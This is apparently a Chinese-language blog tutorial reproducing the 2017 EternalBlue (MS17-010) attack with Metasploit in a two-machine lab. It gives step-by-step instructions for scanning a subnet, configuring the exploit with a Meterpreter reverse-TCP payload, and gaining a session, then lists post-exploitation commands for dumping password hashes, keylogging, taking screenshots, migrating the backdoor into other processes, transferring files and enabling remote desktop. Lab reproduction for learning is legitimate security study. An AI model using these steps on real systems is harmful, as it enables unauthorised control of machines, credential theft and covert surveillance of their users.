前言:
现时兄弟们对“永恒之蓝漏洞攻击”大约比较着重,我们都想要分析一些“永恒之蓝漏洞攻击”的相关知识。那么小编同时在网摘上网罗了一些关于“永恒之蓝漏洞攻击””的相关内容,希望小伙伴们能喜欢,大家快快来学习一下吧!2017年 网络上出现了可怕的网络安全漏洞-永恒之蓝 其目的就是攻击者可以使用该漏洞远程获取目标主机的管理员权限。
网络拓扑
永恒之蓝复现,这里准备了两台电脑,一台攻击机 一台靶机。
1、在攻击机器中启动命令msfconsole
2、在攻击机中搜索漏洞模块ms17-010
3、先调用搜索到的模块,在查看该模块的配置选项。
4、设置要攻击靶机的ip地址,如果不清楚具体目标IP地址,可以设置IP地址段,如:192.168.1.*)
5、确认设置配置信息后,开始对目标靶机进行扫描,并且进行攻击。
6、显示带有Host is likely VULNERABLE的有可能就是存在漏洞的机器。
7、利用ms17-010的漏洞进行攻击,在msfconsole中调用攻击模块,并查看选项。
注:如果payload不是当前这个,建议更改payload 使用set payload windows/x64/meterpreter/reverse_tcp这个。
8、输入目标主机的ip地址后,再输入run命令进行攻击
9、输入run命令后,就能获取导目标主机的session
10、获取到目标主机的session后常用命令。
注意:发现有乱码,可以使用chcp 65001命令消除乱码。
help #获取所有可用命令
getuid #获取当前权限
screenshot #截屏
hashdump #获取密码的hash
ps #获取进程列表
sysinfo #获取系统信息
route #获取路由表
getpid #获取当前攻入的进程pid
migrate #将当前后门注入迁移到其他程序
keyscan_start # 开启键盘记录
keyscan_dump #显示键盘记录 使用永恒之蓝攻入的session默认不能进行键盘记录 ,如果迁移到其他程序就可以做,比如notepad.exe
download/upload #上传下载文件
keyscan_stop # 监视键盘记录
bg # 回到metasploit界面
11、获取到目标主机的session之后,就可以完全拿到管理员权限进行远程控制。
打开和关闭系统防火墙。
开启目标主机的远程桌面命令
run getgui -e或者run post/windows/manage/enable_rdp
然后再攻击机中输入rdesktop 192.168.1.150打开目标主机的桌面。
标签: #永恒之蓝漏洞攻击